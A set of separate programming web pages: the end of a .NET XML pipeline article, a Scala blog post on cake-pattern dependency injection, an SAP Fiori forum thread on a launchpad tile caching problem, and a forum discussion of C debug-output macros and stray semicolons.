public static void XmlToPng(XmlReader reader, Stream output) { // Create a XmlSerializer that will create an // object from the bar graph string ns = ""; XmlSerializer serializer = new XmlSerializer(typeof(BarGraphImage),ns); // Create a new instance of the BarGraph class from the XML BarGraphImage graphImage = (BarGraphImage)serializer.Deserialize(reader); // Write The Image graphImage.WriteImage(output,ImageFormat.Png); } To map the Bar Graph XML to our class, we use attributes (the stuff in the square brackets) to provide hints. For example, the BarGraphImage class will correspond to our top level <BarGraph> element. A useful feature of XmlSerializer is that it will automatically size and populate arrays, so we can leave out helper methods like AddBar(). This can save you a lot of code, especially when instantiating large and deep object graphs. [XmlRoot("BarGraph")] public class BarGraphImage { public BarGraphImage() {} private Bar[] _bars; [XmlElement("Bar")] public Bar[] Bars { get {return _bars;} set {_bars = value;} } public void WriteImage(Stream output, ImageFormat format) { .... } public static void XmlToPng(XmlReader reader, Stream output) { .... } } public class Bar { public Bar() {} public string Title; public double Value; } OutputAction() #3: A Network XML Consumer Perhaps our application is just part of a distributed pipeline or needs to pass the bar graph XML into some sort of content management store. Here we'll pass the bar graph XML on to a protected REST webservice. Create a web request, and supply the Windows credentials in which the application is running, public void OutputActions(XmlReader graphReader) { string url = ""; WebRequest uploader = WebRequest.Create(url); uploader.Method="POST"; Supply the appropriate credentials, uploader.Credentials = CredentialCache.DefaultCredentials; And use the WriteNode() method of XmlWriter to write the contents of the XmlReader to the request stream. Stream upStream = uploader.GetRequestStream(); XmlWriter upWriter = new XmlTextWriter(upStream,Encoding.UTF8); upWriter.WriteNode(graphReader,true); upWriter.Close(); upStream.Close(); uploader.GetResponse(); } Conclusion This architecture is not for everybody. For some, the approach will place unwelcome constraints on W3C XML Schema and class design. Also throughput and security considerations may make it inappropriate for some applications. However, for applications that live in dynamic environments, you achieve true loose coupling of components with all the flexibility of XML. An XmlReader producing and consuming components of your application can be readily swapped out, improved, or reused by other applications or pipelines. It also reduces the amount of wiring required to tie components together. More tools are on the way for XML-centric applications in the upcoming versions of .NET and Windows, named Whidbey and Longhorn respectively. .Net brings XQuery Support and the new XmlReader and XmlWriter implementations ObjectReader and ObjectWriter, providing additional support for serializing and deserializing objects. Longhorn's XAML, which uses XML to define windows UI elements, can make interface elements a transformation away from your data or schema XML.
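As a closing sketch of how the pieces above snap together, here is hypothetical glue code of my own (the IGraphSource and IGraphSink names are invented and do not appear in the article): any GetXml() producer can be paired with any OutputAction() consumer, with the bar graph schema as the only contract between them.

    using System.Xml;

    // Hypothetical seams: a source yields bar graph XML, a sink consumes it.
    public interface IGraphSource { XmlReader GetXml(); }
    public interface IGraphSink { void OutputAction(XmlReader graphReader); }

    public class GraphPipeline
    {
        // Swap in the REST, database, or form source and the SVG, PNG,
        // or network sink without changing this driver.
        public static void Run(IGraphSource source, IGraphSink sink)
        {
            XmlReader graphReader = source.GetXml();
            try
            {
                sink.OutputAction(graphReader);
            }
            finally
            {
                graphReader.Close();
            }
        }
    }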
https://www.xml.com/pub/a/2004/05/12/dotnet.html
CC-MAIN-2018-34
en
refinedweb
The same content appears below, but please be warned that the internal links are broken, and the code formatting is not to my liking: Component Based Dependency Injection in Scala Initial version by John Sullivan, February 2013 Introduction As a software engineer at The Broad Institute, I’ve been very fortunate to be able to program in Scala for the past 2+ years. I got to start one major project from scratch, and was able to select the best Scala tools and libraries, and really take the time to work through a solid software design process. One of the earliest design decisions I needed to make on this project is what to use for dependency injection. I knew I could always fall back on using Java-based tools such as Spring or Guice, but I wanted to look around for a solution that might be a more natural approach for Scala. I happened upon the “cake pattern”, as described in Scalable Component Abstractions by Martin Odersky, and Real-World Scala: Dependency Injection (DI) by Jonas Bonér. I ended up adopting the cake pattern in the manner described in the Jonas Bonér paper, with some modifications. I’ve gained a lot of practical experience in using the cake pattern, (which I’ve come to call “component based dependency injection”, or “CBDI” for short), and wanted to share some of those lessons here. Two of the most interesting extensions of the cake pattern I discovered are hierarchical components, and encapsulating the details of a composite component, both discussed below. I use the examples from the Bonér paper as a launching point, and I focus my comparisons to Spring when considering Java based DI frameworks, since I am much more familiar with Spring than with Guice. One final note before I get going: Much of the source code presented here is available in GitHub project CBDI. I tend to use unit tests to exercise my code, so be sure to look in src/test/scala for running examples. The Bonér Approach I’ll use the approach presented in the Bonér paper as a launching point for describing how I employ the cake pattern. I start from this paper instead of the Odersky paper because the syntax is a little out-dated in the Odersky paper, and because the Bonér paper is a little easier to understand. This is the final UserRepository/UserService example that Bonér comes up with, with slight modifications from me to fill out some details of the example he leaves out: case class User(username: String, password: String) trait UserRepositoryComponent { val userRepository: UserRepository class UserRepository { def create(user: User): Unit = println("create " + user) } } trait UserServiceComponent { self: UserRepositoryComponent => val userService: UserService class UserService { def create(username: String, password: String): Unit = userRepository.create(User(username, password)) } } object ComponentRegistry extends UserServiceComponent with UserRepositoryComponent { val userRepository = new UserRepository val userService = new UserService } Bonér does not suggest any terminology for the “service” classes defined within the components, such as UserRepository and UserService in the above example. This makes the discussion below a little awkward. I’m going to call them injectables, for lack of a better term. In Spring, the injectable itself is called a component. By contrast, here, the component consists of both the injectable’s API, and the point of access for the injectable. 
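One thing the example does not show is the registry being used from calling code; a minimal sketch (the Main object is my own illustration, not part of the Bonér example):

    object Main {
      def main(args: Array[String]): Unit = {
        // userRepository was wired into UserService through the self-type,
        // so this ends up printing "create User(charlie,swordfish)".
        ComponentRegistry.userService.create("charlie", "swordfish")
      }
    }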
Separating Interface from Implementation One drawback to the Bonér approach is that there is no interface defined for the UserRepository and UserService implementations; We haven’t really separated out interface and implementation for these injectables. Bonér chooses not to make this separation for the purpose of simplicity, but it is unclear if that choice is just for the sake of presentation in the paper, or if it applies to his use in production code as well. Without separation of interface and implementation, the only way to really get an alternative implementation of one of our injectables - including mock objects - is by subclassing the original and overriding its methods. I wasn’t satisfied with this; I needed a genuine interface for these injectables. So I took the above concept one step further, as follows: case class User(username: String, password: String) trait UserRepositoryComponent { val userRepository: UserRepository trait UserRepository { def create(user: User): Unit } } trait UserRepositoryComponentImpl extends UserRepositoryComponent { override val userRepository: UserRepository = new UserRepositoryImpl private class UserRepositoryImpl extends UserRepository { override def create(user: User) = println("create " + user) } } trait UserServiceComponent { val userService: UserService trait UserService { def create(username: String, password: String): Unit } } trait UserServiceComponentImpl extends UserServiceComponent { self: UserRepositoryComponent => override val userService: UserService = new UserServiceImpl private class UserServiceImpl extends UserService { override def create(username: String, password: String) = userRepository.create(User(username, password)) } } trait ComponentRegistry extends UserServiceComponent with UserRepositoryComponent trait ComponentRegistryImpl extends ComponentRegistry with UserServiceComponentImpl with UserRepositoryComponentImpl I’ve applied the separation of interface and implementation to the component registry itself, which is going to seem a little pointless until I introduce hierarchical components below. The above separation of interface and implementation creates an annoying plethora of seemingly meaningless repeated code, but this seems to be a general problem with separating implementation from interface. I could imagine a language having features to make this kind of pattern less verbose - for instance, a way to define an interface and a default implementation in a single pass - but I don’t know of any languages that support this. I’ve made the choice of putting the interface and default implementation in the same source file. This makes it easier to scan the contents of a directory, at the expense of having to skip some extra “preamble” towards the top of the file to get to the real content. Unit Testing with Mock Objects Jonas Bonér uses specs and jMock for unit testing DI components with mock objects. For the sake of variety, I will demonstrate a unit test with ScalaTest and EasyMock. 
First, let’s create our component registry of mock objects: // libraryDependencies += "org.scalatest" %% "scalatest" % "1.9.1" % "test" // // libraryDependencies += "org.easymock" % "easymockclassextension" % "3.1" % "test" import org.scalatest.mock.EasyMockSugar trait ComponentRegistryMock extends ComponentRegistry with EasyMockSugar { val userService = mock[UserService] val userRepository = mock[UserRepository] } Next, we’ll write a unit test for UserServiceImpl.create: import org.easymock.EasyMock.reset import org.scalatest.FlatSpec class UserServiceSpec extends FlatSpec with ComponentRegistryMock with UserServiceComponentImpl { behavior of "UserServiceImpl.create" it should "delegate to UserRepository.create" in { val user = User("charlie", "swordfish") expecting { userRepository.create(user) } whenExecuting(userRepository) { userService.create(user.username, user.password) } reset(userRepository) } } We make sure to inherit from UserServiceComponentImpl last, so that we get a UserServiceImpl as the userService injected dependency, hiding the mock UserService. Using Hierarchical Components for Expressing Design Constraints Let’s take the above example a step further, and add in multiple “service” and “repository” components. We could easily just add them in to the ComponentRegistry and ComponentRegistryImpl traits described above. But if we do this, we are building out a large flat space of objects with no organization to them. As the number of components grows, things will get more and more disorganized. We also want to be able to express design constraints such as “service components should be able to access repository components, but not vice versa.” In the following example, we show how to accomplish these goals using the existing user components, plus service and repository components for a new “project” entity: trait RepositoryComponent extends ProjectRepositoryComponent with UserRepositoryComponent trait RepositoryComponentImpl extends RepositoryComponent with ProjectRepositoryComponentImpl with UserRepositoryComponentImpl trait ServiceComponent extends ProjectServiceComponent with UserServiceComponent { self: RepositoryComponent => } trait ServiceComponentImpl extends ServiceComponent with ProjectServiceComponentImpl with UserServiceComponentImpl { self: RepositoryComponent => } trait TopComponent extends ServiceComponent with RepositoryComponent trait TopComponentImpl extends TopComponent with ServiceComponentImpl with RepositoryComponentImpl This prevents component access that does not conform to design constraint. For instance, suppose we tried to have the ProjectRepository access the UserService, as follows: trait ProjectRepositoryComponent { val projectRepository: ProjectRepository trait ProjectRepository { def create(project: Project): Unit } } trait ProjectRepositoryComponentImpl extends ProjectRepositoryComponent { self: UserServiceComponent => // <= does not compile! 
override val projectRepository: ProjectRepository = new ProjectRepositoryImpl private class ProjectRepositoryImpl extends ProjectRepository { override def create(project: Project) = println("create " + project) } } This design constraint violation produces the following compiler error: [error] RepositoryComponent.scala:9: illegal inheritance; [error] self-type RepositoryComponentImpl does not conform to ProjectRepositoryComponentImpl's selftype ProjectRepositoryComponentImpl with UserServiceComponent [error] with ProjectRepositoryComponentImpl [error] ^ Unfortunately, it’s not completely obvious what the problem is from the error message. Furthermore, the error message directs the developer’s attention to RepositoryComponentImpl, instead of ProjectRepositoryComponentImpl. This could easily lead a naive developer into attempting to resolve the error like so: trait RepositoryComponentImpl extends RepositoryComponent with ProjectRepositoryComponentImpl with UserRepositoryComponentImpl { self: ServiceComponent => } This fixes the compiler error, but it breaks our design constraint! I’ve developed the habit of adding warnings in comments to protect against this kind of mistake. For example: trait RepositoryComponentImpl extends RepositoryComponent with ProjectRepositoryComponentImpl with UserRepositoryComponentImpl { // do not self-type to ServiceComponent here as it breaks design constraint! } Examples of Application Design Constraints The particular design constraints that you will want to enforce will depend largely on the architecture or your particular application. However, I would like to demonstrate a couple of standard application architectures, to give you a sense of the possibilities. The components for a standard web application might be organized like so: A typical desktop GUI application with a service layer for accessing external resources might have the following organization: Mock Objects with Hierarchical Components For the sake of completeness, here is a suite of mock objects for the new, hierarchical design: import org.scalatest.mock.EasyMockSugar trait RepositoryComponentMock extends RepositoryComponent with EasyMockSugar { val projectRepository = mock[ProjectRepository] val userRepository = mock[UserRepository] } trait ServiceComponentMock extends ServiceComponent with EasyMockSugar { self: RepositoryComponent => val projectService = mock[ProjectService] val userService = mock[UserService] } trait TopComponentMock extends TopComponent with ServiceComponentMock Encapsulating the Details of a Composite Component One advantage to using hierarchical components for dependency injection over frameworks like Spring is that we can actually hide the implementation details of a composite component within its implementation. For instance, consider the following ChartViewFactory, which constructs an appropriate ChartView for the supplied Chart. 
The ChartViewFactoryImpl accomplishes this by delegating to another factory based on the particular type of chart: trait ChartViewFactoryComponent { val chartViewFactory: ChartViewFactory trait ChartViewFactory { def create(chart: Chart): ChartView } } trait ChartViewFactoryComponentImpl extends ChartViewFactoryComponent { self: HistogramViewFactoryComponent with ScatterPlotViewFactoryComponent => override val chartViewFactory: ChartViewFactory = new ChartViewFactoryImpl private class ChartViewFactoryImpl extends ChartViewFactory { override def create(chart: Chart) = { chart match { case c: Histogram => histogramViewFactory.create(c) case c: ScatterPlot => scatterPlotViewFactory.create(c) } } } } The ChartViewFactoryComponent is a sub-component of the ChartViewComponent, which in turn is a sub-component of the ViewComponent. But notice that the ChartViewComponentImpl contains extra components for the factories that we delegate to: trait ChartViewComponent extends ChartViewFactoryComponent trait ChartViewComponentImpl extends ChartViewComponent with ChartViewFactoryComponentImpl with HistogramViewFactoryComponentImpl with ScatterPlotViewFactoryComponentImpl trait ViewComponent extends TopViewComponent with ChartViewComponent trait ViewComponentImpl extends ViewComponent with TopViewComponentImpl with ChartViewComponentImpl This tactic of including the sub-components in the parent component implementation, but excluding them from the parent component interface, limits their visibility to within that parent component. For instance, it would be illegal for TopViewComponentImpl to self-type on HistogramViewFactoryComponent. Prototyping Components Spring provides support for injectables with different life cycle scopes, such as singleton, prototype, request, and session. The typical life cycle used in dependency injection is singleton, where a single instance is created for use throughout the entire application. Clearly, the dependency injection system described here is not going to support request and session scopes out of the box. But it is possible to mimic a prototyping Spring component. Here is how we would define and use it in Java and Spring: @Component @Scope("prototype") public class StatefulService { // ... } @Component public class ReferencingService { // every referencing component will get its own instance of the service @Autowired private StatefulService statefulService; } To mimic this with component based dependency injection in Scala, we can simply use a def instead of a val to define the injectable: trait StatefulServiceComponent { def statefulService: StatefulService trait StatefulService { // ... } } trait StatefulServiceComponentImpl extends StatefulServiceComponent { override def statefulService: StatefulService = new StatefulServiceImpl private class StatefulServiceImpl extends StatefulService { // ... } } The major drawback here is that each time statefulService is referenced, a new instance of the service will be created. With Spring prototypes, you get a single instance of StatefulService per referencing component. So to make this work, you need to reference the StatefulService exactly one in the referencing component: trait ReferencingServiceComponent { def referencingService: ReferencingService trait ReferencingService { // ... 
} } trait ReferencingServiceComponentImpl extends ReferencingServiceComponent { self: StatefulServiceComponent => override def referencingService: ReferencingService = new ReferencingServiceImpl private class ReferencingServiceImpl extends ReferencingService { // create and store a single instance of the stateful service for use here private val myStatefulService = statefulService // ... } } In the end, it will probably be more clear and manageable to create a StatefulServiceFactoryComponent, and inject the StatefulServiceFactory. The bottom line here is that component based dependency injection is not going to do any life cycle management for you. Injecting the Top Component into the Application There are many ways to make the component hierarchy accessible to the application. There is no right answer, but to a certain extent, it depends on the nature of the application. For instance, I’ve had to take different approaches for standalone applications, and for applications that are built with a framework such as Lift or Play. Standalone Application In a standalone client application, injecting the TopComponent is relatively straightforward. The top-level application class is conceptually defined as follows: abstract class MyApplication extends TopComponent { def start = { // ... } // ... } The only thing that makes the MyApplication class abstract is the fact that it has not been provided with an implementation of the TopComponent. This is easily done in the main method of the program: object MyApplication { def main(args: Array[String]) = (new MyApplication with TopComponentImpl).start } This approach allows us to write unit tests on the methods in the MyApplication class that use a mock implementation of the TopComponent. It also provides for an easy way to switch in alternate application contexts. For instance, maybe I want to stub out some of my service classes in test mode, so I don't need to rely on external resources to test the user interface. I could easily accomplish this like so: object MyApplication { def main(args: Array[String]) = { val app = if (testMode) (new MyApplication with TopComponentTestImpl) else (new MyApplication with TopComponentImpl) app.start } } Framework Application We will need a different approach on an application built in a framework such as Lift or Play, as these frameworks normally take over the responsibilities of implementing the method main, and/or instantiating an object that represents the overarching application. For simplicity, we supply a singleton object that maintains a standard implementation of the TopComponent, like so: trait TopComponent extends RepositoryComponent with ServiceComponent object TopComponentImpl extends TopComponentImpl trait TopComponentImpl extends TopComponent with RepositoryComponentImpl with ServiceComponentImpl Now, in any of the hooks that the framework provides, we can use the TopComponentImpl companion object to access the server-side dependency injection framework. For example, here is some code for installing our own exception handler into the Lift framework. 
The call into the TopComponent singleton is highlighted in red: class BootLoader extends Bootable { def boot = { LiftRules.exceptionHandler.prepend { case (_, _, throwable) => { val errorReport = ErrorReport( throwable, Authenticater.userRequestVar.is.get.username) TopComponentImpl.errorReportService.handleErrorReport(errorReport) InternalServerErrorResponse() } } } } Gotchas and Edgy Cases Initialization and Initialization Order It’s important to know that your injectables are going to be initialized in Scala class linearization order. The linearization order for the components that belong to your TopComponentImpl will be initialized differently, depending on the order that the components are listed in the definition of your TopComponentImpl. Scala class linearization rules are complicated, so it’s probably not a good idea to make this component ordering have any special meaning. For readability, I prefer to order them lexicographically. It’s important to understand that the order does matter, but only if your components are accessing their dependencies at initialization time. For instance, consider the following example: trait Service1Component { val service1: Service1 trait Service1 { def announce(): Unit } } trait Service1ComponentImpl extends Service1Component { override val service1: Service1 = new Service1Impl private class Service1Impl extends Service1 { override def announce() = println("hi from Service1!") } } trait Service2Component { val service2: Service2 trait Service2 } trait Service2ComponentImpl extends Service2Component { self: Service1Component => override val service2: Service2 = new Service2Impl private class Service2Impl extends Service2 { service1.announce() // has service1 been initialized yet? } } trait TopComponent1 extends Service1Component with Service2Component // this works trait TopComponent1Impl extends TopComponent1 with Service1ComponentImpl with Service2ComponentImpl trait TopComponent2 extends Service2Component with Service1Component // this throws NullPointerException when initializing Service2Impl trait TopComponent2Impl extends TopComponent2 with Service2ComponentImpl with Service1ComponentImpl There are two ways around this problem. The simplest is to just agree that a component should not access any of its dependencies until after initialization is complete. Alternatively, you could always declare your injectables as lazy, and make sure there are no cyclic references between injectables during initialization. This latter approach may sound a little dubious, but there are instances where accessing dependencies during initialization comes in handy. For instance, it’s standard practice in Scala-Swing to lay out the child components of a panel when that panel is being initialized. If both the panel and some of its sub-components are injectables, then it would be quite natural for the panel to access an injected dependency at initialization time. It’s worth noting that, unlike in Spring, cyclic references between injectables is not in and of itself a problem. However, this is not a recommended practice, as cyclical dependencies between components is a sign of tight coupling between these components. These components should probably be refactored to remove the cyclic references. Does the Self Type Belong on the API or the Implementation? One question that often came up for me was, should I declare my dependencies just at the implementation level, or at the API level as well? 
This question applies to both simple, leaf-node components, as well as container components. It is only strictly necessary on the implementation class, but where to put it is a matter of style. Generally speaking, I try to ask myself, “is this dependency an implementation detail of the service?” Normally it is, but sometimes it makes sense at the interface level. Consider, for example, a ControllerComponent in a typical MVC application. It’s a central part of the MVC design pattern that the ControllerComponent references the ModelComponent and the ViewComponent. In this case, I would choose to add the self types on the ControllerComponent, and not just the ControllerComponentImpl. Two Injectables with the Same Name Even though we are able to organize our components into hierarchies, and restrict access to components in various ways, we still end up with all our injectables in a single name space. Any name collisions are going to produce a compiler error about incompatible types, even if the injectables with the conflicting names are never available from any single component. Why Overriding the Injectable in the Implementation is So Verbose It may seem overly verbose to repeat the type of the injectable when overriding it in the implementation class. For instance, here I have to redeclare exampleService to have type ExampleService: trait ExampleServiceComponent { val exampleService: ExampleService trait ExampleService } trait ExampleServiceComponentImpl extends ExampleServiceComponent { // why do I have to redeclare the type of exampleService?? override val exampleService: ExampleService = new ExampleServiceImpl private class ExampleServiceImpl extends ExampleService } If I leave out this type redeclaration, I am actually narrowing the type of exampleService to ExampleServiceImpl, since this is the inferred type from the right-hand side of the assignment. But this is illegal, since I have declared ExampleServiceImpl to be private: [error] ExampleServiceComponent.scala:12: private class ExampleServiceImpl escapes its defining scope as part of type ExampleServiceComponentImpl.this.ExampleServiceImpl [error] override val exampleService = new ExampleServiceImpl [error] ^ Admittedly, making the implementation class private does not accomplish much, since dependent classes will self type on ExampleServiceComponent, and not ExampleServiceComponentImpl. The only place this type could actually be accessed would be in a containing component implementation, such as TopComponentImpl. It would be highly unusual to be making any use of ExampleServiceImpl there. In the end, I chose to make these implementation classes private based on the principle of information hiding. You might choose to not bother making the implementation classes private. Indeed, if we were to take this thinking to its logical conclusion, the interface elements would be protected, and the implementation would be private[this], like so: trait UserRepositoryComponent { protected val userRepository: UserRepository protected trait UserRepository { def create(user: User): Unit } } trait UserRepositoryComponentImpl extends UserRepositoryComponent { override protected val userRepository: UserRepository = new UserRepositoryImpl private[this] class UserRepositoryImpl extends UserRepository { override def create(user: User) = println("create " + user) } } Conclusions There are two major drawbacks to component based dependency injection as I see it. 
One major problem is that the code constructs can be quite difficult to understand by those unfamiliar with the pattern. I would recommend developer-level documentation describing your particular usage patterns to overcome this obstacle. As with many new programming techniques, it can seem confusing and strange, but I expect most developers would get used to it pretty quickly. The other major problem with this approach is that it is a little verbose at the source code level. There’s certainly more boilerplate involved than we are used to with Scala, or that we would need to generate when using a library like Spring. Component based dependency injection also has many benefits. Some are described in this paper, particularly hierarchical components and component encapsulation. Hierarchical components allow users to express their component structure in a rich, tree-like fashion instead of as a single flat component space. Design constraints (i.e., which components can see which other components) become enforceable at compile time. Finally, component encapsulation allows the details of a composite component to be hidden from other components in the hierarchy. Tailoring a solution around a language-level feature allows for much greater flexibility than using a library or framework, and other people may find themselves solving problems with a hand-rolled component based dependency injection system that would not be possible with a pre-rolled solution. A language-level solution can potentially reduce the application footprint, which can be an important issue for desktop and mobile applications. Also, the costs of learning and maintaining knowledge of a complex framework like Spring, and integrating it into your application, can often be underestimated. I would imagine that, in the end, these costs would be similar to the costs of using the component based dependency injection described here. But my intent in this paper is not to evangelize the cake pattern approach to dependency injection. Instead, I try to provide practical examples for using this approach, and to discuss and flesh out some of the issues that you might come across that are not presented in earlier work. I really appreciate you sharing this. Your observation that cake is difficult at first for those unfamiliar with the pattern is spot-on. Regarding your second observation, that the code is too boilerplate-y, I wonder whether there is an opportunity here for a thin "Scala-Guice" that can cut down on that. Thanks for the feedback Morgan. In regards to Scala & Guice, I noticed this post that came by quite recently, but I haven't had time to look at it closely yet: In regards to reducing boilerplate, there is a discussion about this now on scala-user Google group. This may even be possible with the new macros language feature in Scala 2.10.
http://scabl.blogspot.com/2013/02/cbdi.html
CC-MAIN-2018-34
en
refinedweb
Hi, I have three FIORI applications deployed in SAP and there is one common gateway service used in all three applications. I have created three static tiles, e.g. Tile1, Tile2, Tile3, and mapped the respective application against each one. All the deployed apps use the same namespace. The issue is: when I click on the first tile, the URL looks good (..../FioriLaunchpad.html#tile1semanticobject-display) and it displays the correct application. If I then go back and click on another tile (Tile 2 or Tile 3), the URL changes according to the tile clicked, but I get the same application that is assigned to Tile 1. If I refresh my browser and then click Tile 2, it does show the correct version. Summary: all the tiles show the right URL, but the application they display is the one the user clicked first; the rest of the tiles keep showing the same one until the browser is refreshed.

Hi, I found the solution for it:
1. The namespace for all these applications was the same, and I guess that confused the browser about which application to load.
2. After resolving the namespace issue, it was still giving me the older version of the application, and that was a caching issue. I ran the following transactions to get rid of it:
/UI2/DELETE_CACHE
/UI2/CHIP_SYNCHRONIZE_CACHE
/UI2/DELETE_CACHE_AFTER_IMP
/UI2/INVALIDATE_CLIENT_CACHES
/UI2/INVALIDATE_GLOBAL_CACHES
/UI5/APP_INDEX_CALCULATE
https://answers.sap.com/questions/212221/sap-launchpad-tiles-browser-refresh-issue.html
CC-MAIN-2018-34
en
refinedweb
#ifdef TEST_ECHO_OUTPUT
#define TEST_ECHO_MACRO(x) my_debug_out(#x); // expands to call
#else
#define TEST_ECHO_MACRO(x) // expands to nothing
#endif

#ifdef TEST_ECHO_OUTPUT
#define TEST_ECHO_MACRO(x) my_debug_out(x) // expands to call
#else
#define TEST_ECHO_MACRO(x) // expands to nothing
#endif

void my_debug_out(int x) { /* ... */ }

int main(void) { int a = 1; TEST_ECHO_MACRO(a); return 0; }

#ifdef TEST_ECHO_OUTPUT
#define TEST_ECHO_MACRO(x) my_debug_out(x); // expands to call
#else
#define TEST_ECHO_MACRO(x) // expands to nothing
#endif

TEST_ECHO_MACRO("test output")

#ifdef TEST_ECHO_OUTPUT
#define TEST_ECHO_MACRO(x) my_debug_out(x) // Will expect a semi-colon
#else
#define TEST_ECHO_MACRO(x) do {} while(false) // Will expect a semi-colon also, but will be optimized away
#endif

#include <stdio.h>
#define DO_TRACE // Comment me to change behavior
#ifdef DO_TRACE
#define TRACE(x) printf("trace: %d\n", x);
#else
#define TRACE(x)
#endif

void foo() { printf ("Part2\n"); }

int main() {
    int n = 0;
    if (n < 10)
        printf ("Part1\n");
    else
        TRACE(n) // When DO_TRACE is disabled the semi-colon goes with it so foo() becomes part of this if/else
    foo();
    return 0;
}

#ifdef DO_TRACE
#define TRACE1(x) printf("trace: %d\n", x)
#else
#define TRACE1(x)
#endif

#ifdef DO_TRACE
#define TRACE2(x) printf("trace: %d\n", x);
#else
#define TRACE2(x) ;
#endif

// Check the code below with trace both on and off.
if ( a ) TRACE1(x) else TRACE1(y)
if ( a ) TRACE1(x); else TRACE1(y);
if ( a ) TRACE2(x) else TRACE2(y)
if ( a ) TRACE2(x); else TRACE2(y);

The macros involved are a bit cumbersome. Perhaps better is to call the function and let it do an immediate return if debugging is disabled. Another solution is to encapsulate the function call: #define MY_DEBUG_OUT(a) {if (TEST_ECHO_OUTPUT) my_debug_out(a);} Good Luck, Kent

Sorry, what do you mean "expands to nothing" exactly? Literally, blank space? (Being sure because I will need to defend my decision to superiors.)

>>space? Yes, exactly. The preprocessor will just remove the line if TEST_ECHO_OUTPUT is not set.

And for #define MY_DEBUG_OUT(a) {if (TEST_ECHO_OUTPUT) my_debug_out(a);}, I think that's a logical test that is left over if test mode not #defined, isn't it? Don't want that either, my superiors would tell me to live with the three-line calls.

#define MY_DEBUG_OUT(a) {if (TEST_ECHO_OUTPUT) my_debug_out(a);} will cause a compiler error if TEST_ECHO_OUTPUT is not set, I am not sure that this is what you want...

jkr: true, although I was planning on setting TEST_ECHO_OUTPUT to either 1 or 0. But your comment makes me wonder... a more experienced coworker does it differently: #define TEST_ECHO_OUTPUT // comments this out to disable, then #ifdef TEST_ECHO_OUTPUT; whereas I do this: #define TEST_ECHO_OUTPUT 1 // change to 0 to disable, then #if TEST_ECHO_OUTPUT. Is his approach more traditional? Does it result in tighter code?

Is there a disadvantage to my approach, other than the danger of omitting a #define altogether and breaking the code (as you point out)? (Thanks. Sorry to piggy back this question, but I seem to have expert attention.)

Simply this is more than enough (note that I removed the ; at the end of the macro too - to avoid confusion):

His approach is how this is normally done, yes. The reason being, the semantics of "exists or otherwise" are clearer than "does it exist, and does it have a value, and if so what is that value". Because it was used in the Q in my_debug_out(#x); and would be required for my_debug_out(a); I'd also rather not use it.

Do you mean the "#"? My compiler documentation tells me that's how you pass parameters to a macro. If I have that wrong, I will figure that out momentarily...

>>macro. No, not really: The number-sign or stringizing operator (#) converts macro parameters (after expansion) to string constants. It is used only with macros that take arguments. If it precedes a formal parameter in the macro definition, the actual argument passed by the macro invocation is enclosed in quotation marks and treated as a string literal. The string literal then replaces each occurrence of a combination of the stringizing operator and formal parameter within the macro definition. White space preceding the first token of the actual argument and following the last token of the actual argument is ignored. Any white space between the tokens in the actual argument is reduced to a single white space in the resulting string literal. Thus, if a comment occurs between two tokens in the actual argument, it is reduced to a single white space. The resulting string literal is automatically concatenated with any adjacent string literals from which it is separated only by white space.

I've known some compilers to get ratty if you put a ; at the end of the usage of the macro, e.g. TEST_ECHO_MACRO(a); // In release this is a noop but leaves a rogue semi-colon behind. The release build is a no-op so you end up with a line that just contains a ; and whilst this shouldn't be an issue I've known some compilers to generate a warning. To get around this I normally use a do/while noop, like below. It'll get optimized away in release build but prevent the potential warning.

Not really since my_debug_out takes an int as parameter.

>> BTW, then you'll be fine with
Except for the fact that my_debug_out doesn't take a string as parameter, I still prefer not having a ; at the end of a macro ... It's so counter-intuitive this way:

#define TEST_ECHO_MACRO(x) my_debug_out(x);
int a = 0;
TEST_ECHO_MACRO(a) /* <--- no ; at the end of this line */
some_more_code();

that I prefer "forcing" the user of my macro to add the ;

#define TEST_ECHO_MACRO(x) my_debug_out(x)
int a = 0;
TEST_ECHO_MACRO(a); /* <--- now the ; HAS to be there at the end of this line */
some_more_code();

IMO, no. The way I suggest forces the semi-colon to be added at the end when you use it so it looks more naturally like a function call.

>> I prefer "forcing" the user of my macro to add the ;
Me too, hence my suggestion above :)

Well, I saw it, but a semicolon is not 'rogue' at all. It would expand to void my_main_code() { int a; a =1; ; } which is legal C/C++.

Agreed, I never said it wasn't... it's just that some (mainly older) compilers will issue a warning if you build with high warning levels. It also forces the caller to provide it so it makes the code more consistent (IMO).

I'm not saying do it, I'm just pointing it out as a consideration.

Ah, never seen that ... The C standard explicitly allows empty statements: (6.8.3) expression-statement: expression(opt) ; (the opt meaning optional, of course). What the C standard doesn't allow, however, is a { } block followed by a ; To avoid that, you DO need macros like these if they involve { } blocks:

#define SOME_BLOCK_MACRO do { \
    int i = 0; \
    fun(i); \
} while(0)

Interesting perspective on the need for consistency of semicolon use in main code, I see your point. But should be no technical problems with leaving the semicolon in the macro, right? Just requires extra care by the reviewer? I would have trouble convincing people of the evilrix loop approach, and I don't want a stray semicolon, so that might be my best route.....

Technically, it's ok, yes. I just think not having it in the macro is more consistent.

>> and I don't want a stray semicolon
Don't worry about a stray semicolon (empty statement) ... It's no problem at all. It's perfectly legal. The loop approach evilrix showed was just to avoid warnings on certain old compilers.

I have seen warnings with rogue semicolons too, so I'm prejudiced against them. Unless you actually use the macro like this: TEST_ECHO_MACRO(a);

>> I have seen warnings with rogue semicolons too, so I'm prejudiced against them.
Odd, I've never seen them for empty statements. Oh well ;)

>> Ah, never seen that ... The C standard explicitly allows empty statements:
evil's right .. i'm currently working with a nintendo-ds compiler .. and we get warnings for those *lonesome* semicolons .. since we have set option "warning to errors" this became an issue .. however, you're right jkr .. its legal anyway .. ike

One last follow-on, then I'll close this out. Given the defines

#ifdef TEST_ENABLE_OUTPUT
#define TEST_OUTPUT(x) print_test_message(x); // expands to call; note semicolon is in macro
#else
#define TEST_OUTPUT(x) // expands to nothing
#endif

and the calls

int aa; // = 45;
aa = 45;
print_test_message("Hello1
TEST_OUTPUT("Hello2 %i,%i\r", aa, aa)

why would the outputs be:

?Hello1 45, 45
Hello2 7387, 2552

crazy stuff. My function is below, just puts the characters out UART0. Don't want to make this another draw on your time, just wanted to know any initial thoughts, then I'll start a new question if it gets involved...

char s_buf [100];
void print_test_message( flash char *format, ...)
{
    va_list ap;
    va_start(ap,format);
    vsprintf(s_buf, format, ap);
    va_end(ap);
    putstr0(s_buf);
}

Okay got some help from This has some improvement, but still need to figure out that "?"

#ifdef TEST_ENABLE_OUTPUT
#define TEST_OUTPUT(...) print_test_message( __VA_ARGS__);
#else
#define TEST_OUTPUT(x) // expands to nothing
#endif

Can you show the complete code ?

